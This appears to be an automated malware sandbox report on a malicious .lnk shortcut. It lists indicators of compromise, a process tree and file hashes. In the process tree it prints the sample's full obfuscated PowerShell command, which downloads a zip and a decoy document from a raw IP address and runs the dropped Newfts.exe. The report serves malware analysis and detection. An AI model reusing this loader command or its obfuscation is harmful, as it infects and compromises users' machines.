\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily regedit.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings OpenWith.exe -
Runs regedit.exe 1 IoCs
pid Process 4248 regedit.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4064 WINWORD.EXE 4064 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe 2968 Newfts.exe 1344 Newfts.exe 1344 Newfts.exe 2780 cmd.exe 2780 cmd.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 1844 perfmon.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 8 IoCs
pid Process 4248 regedit.exe 832 OpenWith.exe 192 mmc.exe 600 explorer.exe 4968 OpenWith.exe 4792 mmc.exe 1844 perfmon.exe 4948 taskmgr.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1344 Newfts.exe 2780 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 2720 firefox.exe Token: SeDebugPrivilege 2720 firefox.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe Token: SeIncBasePriorityPrivilege 192 mmc.exe Token: 33 192 mmc.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4248 regedit.exe 4248 regedit.exe 4248 regedit.exe 4248 regedit.exe 2720 firefox.exe 2720 firefox.exe 2720 firefox.exe 2720 firefox.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 1844 perfmon.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2720 firefox.exe 2720 firefox.exe 2720 firefox.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe 4948 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 4064 WINWORD.EXE 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 832 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 3804 OpenWith.exe 2720 firefox.exe 2720 firefox.exe 2720 firefox.exe 2720 firefox.exe 2720 firefox.exe 2720 firefox.exe 2720 firefox.exe 192 mmc.exe 192 mmc.exe 2664 OpenWith.exe 2664 OpenWith.exe 2664 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4068 wrote to memory of 4512 4068 cmd.exe 74 PID 4068 wrote to memory of 4512 4068 cmd.exe 74 PID 4512 wrote to memory of 2968 4512 powershell.exe 75 PID 4512 wrote to memory of 2968 4512 powershell.exe 75 PID 4512 wrote to memory of 2968 4512 powershell.exe 75 PID 2968 wrote to memory of 1344 2968 Newfts.exe 76 PID 2968 wrote to memory of 1344 2968 Newfts.exe 76 PID 2968 wrote to memory of 1344 2968 Newfts.exe 76 PID 1344 wrote to memory of 2780 1344 Newfts.exe 77 PID 1344 wrote to memory of 2780 1344 Newfts.exe 77 PID 1344 wrote to memory of 2780 1344 Newfts.exe 77 PID 4512 wrote to memory of 4064 4512 powershell.exe 79 PID 4512 wrote to memory of 4064 4512 powershell.exe 79 PID 1344 wrote to memory of 2780 1344 Newfts.exe 77 PID 2780 wrote to memory of 600 2780 cmd.exe 86 PID 2780 wrote to memory of 600 2780 cmd.exe 86 PID 2780 wrote to memory of 600 2780 cmd.exe 86 PID 2780 wrote to memory of 600 2780 cmd.exe 86 PID 2780 wrote to memory of 600 2780 cmd.exe 86 PID 832 wrote to memory of 1072 832 OpenWith.exe 103 PID 832 wrote to memory of 1072 832 OpenWith.exe 103 PID 3804 wrote to memory of 3840 3804 OpenWith.exe 105 PID 3804 wrote to memory of 3840 3804 OpenWith.exe 105 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 3020 wrote to memory of 2720 3020 firefox.exe 111 PID 2720 wrote to memory of 3464 2720 firefox.exe 112 PID 2720 wrote to memory of 3464 2720 firefox.exe 112 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 PID 2720 wrote to memory of 4952 2720 firefox.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\brt_1_0147.doc.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo QMwlXCkteAQTQqnkaJqrUqs; echo QvYiYqvrrHquSStJfMRfSfWhN; echo bbOXmbTScxuUqnRAgrxICMaBVDaWjzRzRVcfkbymVEadrSAtp; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo smmOpvMyMQBsjhmNQati; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo XmLObXLAbAaEvFXwLygA; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/brt_1_0147.doc -OutFile brt_1_0147.doc; echo jKSqGTomhhZFxOMFkLZBsdHuhOCDBrMzMONLWouYJOCxTyelGMtYZGs; s''t''a''rt brt_1_0147.doc2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exeC:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:600
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\brt_1_0147.doc" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4064
-
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" LanguagePackInstaller1⤵PID:824
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" LanguagePackInstaller1⤵PID:4680
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Checks BIOS information in registry
- Maps connected drives based on registry
- Remote Services: SMB/Windows Admin Shares
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:4248
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5052
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\f8c7a99f2⤵PID:1072
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\acjoapgloei2⤵PID:3840
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:4944
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.0.836976037\794115958" -parentBuildID 20221007134813 -prefsHandle 1712 -prefMapHandle 1704 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fbaee0cf-e11d-4924-9c61-d6757f6e2eee} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 1796 260664d9458 gpu3⤵PID:3464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.1.130024878\162804932" -parentBuildID 20221007134813 -prefsHandle 2124 -prefMapHandle 2120 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39d5c05b-8469-4aad-9c97-5b70eed2d54a} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 2152 26066032c58 socket3⤵
- Checks processor information in registry
PID:4952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.2.2096759039\1702819443" -childID 1 -isForBrowser -prefsHandle 2716 -prefMapHandle 2908 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {feb224c9-31a1-4127-9f4d-627ac853fef9} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 2712 2606a4ad458 tab3⤵PID:3832
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.3.466358528\1063079877" -childID 2 -isForBrowser -prefsHandle 3436 -prefMapHandle 3432 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5efd5cad-196e-4773-9670-45a286b4021a} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 3448 2605b468d58 tab3⤵PID:2572
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.4.239020053\1559015819" -childID 3 -isForBrowser -prefsHandle 3812 -prefMapHandle 3808 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce115f97-6b1f-48e9-b0d2-825865d2d9d8} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 3820 2606bd55458 tab3⤵PID:5036
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.5.1289245993\283368549" -childID 4 -isForBrowser -prefsHandle 4964 -prefMapHandle 4956 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {38eb3bbc-2817-459e-a214-8f5316679ce9} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 4976 2606cd71858 tab3⤵PID:2852
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.6.1254053976\1435359074" -childID 5 -isForBrowser -prefsHandle 5116 -prefMapHandle 4996 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b916ee2-18e5-404a-944d-91d4dd40d613} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 5104 2606cd71e58 tab3⤵PID:1072
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.7.385640336\887422226" -childID 6 -isForBrowser -prefsHandle 5308 -prefMapHandle 5312 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {46eb5a50-f3f9-473c-9936-4e5c89ba05f1} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 5300 2606d0d8258 tab3⤵PID:4380
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2720.8.1706703317\679939619" -childID 7 -isForBrowser -prefsHandle 5604 -prefMapHandle 5596 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {135c24b7-7862-40de-8a87-2ef0e9ca95eb} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 5636 26068d7ec58 tab3⤵PID:4796
-
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:192
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2664 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\MMC\taskschd2⤵PID:1340
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
PID:1648 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\f8c7a99f2⤵PID:2908
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4968 -
C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"C:\Program Files\Windows NT\Accessories\WORDPAD.EXE" "C:\Users\Admin\AppData\Local\Temp\903004096\payload.dat"2⤵PID:4936
-
-
C:\Windows\System32\iv1hm7.exe"C:\Windows\System32\iv1hm7.exe"1⤵PID:2448
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
PID:4792
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4948
-
C:\Windows\system32\perfmon.exe"C:\Windows\system32\perfmon.exe" /res1⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:1844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵PID:2956
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ca52aa53b6dc75b565896128eed64ae4
SHA12348a96b879c03a785e56379abfec1fb9bdbb6ac
SHA2563b47c96e926dc843f5b52e8d88ab3fa80f4d4689f217c5e8e07ccd7d26ef005c
SHA512653ab06fb2a81fd297a438aa22f0eccaea78a500d360d94fa62b2a75075b47263f76eb0ddc4494591c80a4f5d8e5ece38734290924ca47ca0b692a3be7d69a94
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
916B
MD56b32f09c775b1383b81fa1d26e420d71
SHA160eb544a90307ed87145bd16b5582608738717ed
SHA25627ffe93b4dc14297ad9d5002f7d561ad85f6529f5ff41084f913aebd9bbb0f0f
SHA512b74f0df6f3ef135a765b92bbf0d27d663136f035d04b48df2d899fef180d32398883d3e93d56c1b2ce53548fc90e69ab5895af79030f28534c2aa131cf6bdd03
-
Filesize
1.2MB
MD51a3823aad525d8dbac6021256b282416
SHA1837cabaab195e35c5fb5827e4f3917151ac79ba0
SHA256c6b3c7be8c43c9dc2cf1cdfd8ff64e1dab19ce83dee3c7cdfc3d26ff3af19351
SHA512d3dad168d968a4c9fee1514a2d78581c75433a632f3360f3e68693eda7e8703611af84ff78e5ade4979e52cc91ed0ddc49370569bab8bdc935ca67d29178871d
-
Filesize
142KB
MD50988b432246538865ca36aa4ae2defc4
SHA1f6c30f247fb234df182023fee328620057decbde
SHA2561fc34b4fcad794a7357d383b697920dafe23ad41a1488a8971b4e8f740a52249
